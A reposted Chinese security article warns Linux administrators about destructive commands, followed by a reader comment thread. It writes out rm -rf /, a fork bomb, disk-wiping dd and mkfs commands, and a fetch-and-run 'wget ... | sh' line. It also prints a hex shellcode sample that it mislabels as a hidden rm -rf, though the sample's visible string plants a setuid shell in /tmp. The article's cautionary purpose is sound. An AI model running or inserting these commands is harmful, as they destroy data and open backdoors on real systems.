CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

asanmu

2017年5月23日 980点热度 0人点赞 0条评论
  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

运维请注意:”非常危险“的Linux命令大全

dawner2016-12-08共291139人围观 ,发现 35 个不明物体系统安全

danger_zone.jpg

Linux命令是一种很有趣且有用的东西,但在你不知道会带来什么后果的时候,它又会显得非常危险。所以,在输入某些命令前,请多多检查再敲回车。

rm –rf

rm –rf是删除文件夹和里面附带内容的一种最快捷的方法,但是细微的错误或者语法认知不到位,就可能对系统造成不可恢复的破坏,下面给出一些案例:

rm  删除linux下的文件

rm -r 递归删除文件夹,包括空文件夹

rm -f 强制无条件删除只读文件

rm -rf / : 强制无条件删除root目录下所有内容。

rm -rf * : 强制无条件删除当前目录下所有内容。

rm -rf . : 强制无条件删除当前文件夹和子文件夹

综上所述,在你执行rm –rf命令时千万要小心,大家可以在.bashrc里面添加:

alias rm= 'rm -i'

这样,在你下次删除东西的时候,它会提醒你到底要删啥。

:( ){:|:&};:

这个命令其实是一种fork炸弹,它定义了一个叫“:”的函数,调用了自己两次,一次是在前台,一次是在后台。关键是这样的调用会无限循环,直到系统崩溃。

手贱的同学可以尽管在虚拟机里试试:

 :( ){:|:&};:

任意命令 > /dev/sda

这个例子是讲,我们执行了任意命令,并输出到/dev/sda。这样的话,/dev/sda 里面的文件会被命令输出的内容全部替换掉,最后丢失掉其中原有的数据。

mv 指定的文件夹 /dev/null

这个mv命令会把指定的文件夹移动到/dev/null。在linux下,/dev/null或null是一种特殊的文件,它们会把写入自身的数据全部丢弃,再返回操作成功的消息。

# mv /home/user/* /dev/null

上面的命令会把/home/user/下面所有的内容,全部移动到/dev/null,这就是个无底的神坑。

wget http://malicious_source -O- | sh

这个命令可能会直接下载恶意的源文件,然后使用sh直接执行该脚本。

mkfs.ext3 /dev/sda

上面的例子会格式化/dev/sda,在执行上面的命令后,你的硬盘驱动会被标记为新的。当然,这时系统是无法再恢复数据了。

> 任意文件

这个命令可以用来刷掉原文件里的内容,如果你不小心打错了字,输入了诸如下面的命令:

> xt.conf

你系统配置文件里的内容可能就会因此被清理掉。

^foo^bar

这样利用^符号,通过上翻补全命令的方式,直接编辑之前运行过的命令。虽然你或许因此不用再输入整条长命令,但其实这会很危险。

buquan.png

dd if=/dev/random of=/dev/sda

dd命令会擦掉/dev/sda下面的内容,然后写入随机的垃圾数据,最后你的系统会受到不可逆转的破坏。

隐藏命令

下面的命令相当于rm –rf,它会藏在十六进制hex中。大家在不知情的情况下运行它,可能就会直接擦除掉整个root目录:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

这个故事告诉我们,致命的威胁在隐藏起来的时候,我们通常可能难以发现。

* 参考来源:nw,FB小编dawner编译,转载请注明来自FreeBuf(FreeBuf.COM)

dawner

dawner288 篇文章等级: 9级
|
|
  • 上一篇:Win10 Edge浏览器从越界写到任意内存读写
  • 下一篇:Linux提权?这四个脚本可以帮助你

这些评论亮了

  • Teufel(1级)回复
    @ 红茶不加糖  运维人员请注意,一会会有人去你那执行这些命令;
    )23(亮了
  • taylorwin(5级)回复
    ){:|:&};:
    )9(亮了
  • 红茶不加糖(2级)回复
    我怎么觉得,这些基本都不是运维命令- -告诉我谁会用到这些
    )7(亮了
  • NOL4rb(2级)梦里花落知多少回复
    苦逼的运维:从入门到跑路
    )7(亮了
发表评论

已有 35 条评论

  • taylorwin (5级) 2016-12-08回复1楼

    ){:|:&};:

    亮了(9)
  • 红茶不加糖 (2级) 2016-12-08回复2楼

    我怎么觉得,这些基本都不是运维命令- -告诉我谁会用到这些

    亮了(7)
    • Teufel (1级) 2016-12-08回复

      @ 红茶不加糖  运维人员请注意,一会会有人去你那执行这些命令;

      亮了(23)
      • hahahahah 2016-12-08回复

        @ Teufel  手贱的运维 :mrgreen:

        亮了(4)
    • applepine 2016-12-08回复

      @ 红茶不加糖  估计小白看了真有点用

      亮了(4)
    • ArthurKiller (7级)窃.格瓦拉驻FreeBuf办事处 2016-12-08回复

      @ 红茶不加糖  莫名其妙的想到了携程……

      亮了(5)
      • zusheng (5级)博客:isbase.cc 2016-12-08回复

        @ ArthurKiller  携程怎么啦,表示这个又是什么梗。

        亮了(4)
      • ArthurKiller (7级)窃.格瓦拉驻FreeBuf办事处 2016-12-08回复

        @ zusheng  http://news.mydrivers.com/1/432/432249.htm

        亮了(3)
  • xxnbyy (1级) 2016-12-08回复3楼

    是:(){ :| :& };:

    亮了(3)
  • 云之凡 2016-12-08回复4楼

    啪一下回车键,我root下没东西了 :evil:

    亮了(3)
  • dasanmu (1级) 2016-12-08回复5楼

    rm -rf / 这个不是root目录吧。。是删除所有文件

    亮了(2)
    • hahahahah 2016-12-08回复

      @ dasanmu  所有文件不就是根目录吗

      亮了(3)
      • 一一一一 2016-12-08回复

        @ hahahahah 根目录和root目录一样吗?你linux及格吗?

        亮了(3)
      • hahahahah 2016-12-08回复

        @ 一一一一 估计是你语文不及格,不会结合上下文来理解意思

        亮了(3)
      • OpenATS (2级)英雄你来做,小人我来当。 2016-12-09回复

        @ hahahahah 理解个屎啊 ,搞技术的连这点儿严谨性都没有, 还好意思出来显摆

        亮了(3)
      • hahahahah 2016-12-09回复

        @ OpenATS  你都不结合上下文理解意思,还说自己严谨,你理解的意思都是错的还严谨,果然严谨

        亮了(2)
      • dasanmu (1级) 2016-12-12回复

        @ hahahahah 删除根目录下所有类容和删除root目录下所有内容意义是不一样的

        亮了(0)
  • 哈哈 2016-12-08回复6楼

    :|

    亮了(2)
  • nolove (3级) 2016-12-08回复7楼

    表示曾经使用过 rm –rf 命令 删除了服务器上的所有网站文件,还好有备份,要不我的撞墙,备份是个好习惯

    亮了(3)
  • NOL4rb (2级)梦里花落知多少 2016-12-08回复8楼

    苦逼的运维:从入门到跑路

    亮了(7)
  • filefox (3级) 2016-12-08回复9楼

    :)

    亮了(2)
  • Viper杨 (1级) 2016-12-08回复10楼

    苦命运维~

    亮了(2)
  • whoami亲爱的 2016-12-08回复11楼

    :( ){:|:&};:这条命令有点意思

    亮了(2)
  • lover119 (1级) 2016-12-08回复12楼

    明天新闻,某互联网公司运维人员看FB命令有意思,试了一下,业务中断N小时~~~

    亮了(5)
  • jeremy (1级) 2016-12-08回复13楼

    :smile:

    亮了(2)
  • 琼梧 2016-12-08回复14楼

    最危险的是sudo不用密码的[挖鼻]

    亮了(4)
  • yanislong (1级)根本没有巧合,巧合只是一种幻觉 2016-12-09回复15楼

    我试了:
    ){:|:&};:
    返回这个:
    bash: syntax error near unexpected token `)’
    哪里不对?

    亮了(2)
    • 路过 2016-12-10回复

      @ yanislong  :( ){:|:&};:

      亮了(0)
    • 路过 2016-12-10回复

      @ yanislong  : ( )

      亮了(0)
  • xinfor 2016-12-10回复16楼

    小编那条){:|:&};:命令写错了吧,应该是:(){:|:&};:,;前是函数定义,后是执行函数,意思是定义:函数,在前台执行调用,若没有成功则进行后台调用,此命令执行极快,直到把系统资源耗尽。

    亮了(0)
    • yanislong (1级)根本没有巧合,巧合只是一种幻觉 2016-12-10回复

      @ xinfor :( ){:|:&};:
      bash: syntax error near unexpected token `{:’

      亮了(0)
      • 孟孟孟孟孟孟孟孟 (1级) 2016-12-12回复

        @ yanislong  注意空格

        亮了(0)
      • yanislong (1级)根本没有巧合,巧合只是一种幻觉 2016-12-12回复

        @ 孟孟孟孟孟孟孟孟  见效这么快,回车键刚刚松开机器就没反应了,,,

        亮了(0)
  • JuncoJet 2016-12-10回复17楼

    \rm -rf /

    亮了(0)
  • angellover08 (4级) 2016-12-19回复18楼

    rm -rf /,卧槽,小拇指按enter上了,我TM还没输完呢

    亮了(1)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

dawner

dawner

黎明已经过去,黑暗就在眼前!

288 篇文章376 条评论

相关阅读

  • 6月一个被忽视的微软漏洞MS13-051——记大牛分析过程
  • 安全科普:让高大上的Bash破壳漏洞不再难理解(下)
  • 中间人攻击-DNS欺骗
  • 后门BROOTKIT代码学习和原理分析
  • Dionaea低交互式蜜罐部署详解

特别推荐

关注我们 分享每日精选文章

不容错过

  • 检测一下你的专业指数:2015年十大测试工具你认识几个?FireFrank2015-12-29
  • 追踪、定位、监听一个也不能少:最强悍的监控间谍软件FlexiSPY源码泄露Sphinx2017-04-24
  • 国内影响已扩散,利用“NSA武器库”中漏洞的Wannacry蠕虫勒索软件袭击全球(含修复方案)AngelaY2017-05-13
  • FreeBuf 2017互联网安全创新大会视频&图文直播(已结束)kuma2016-12-29

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me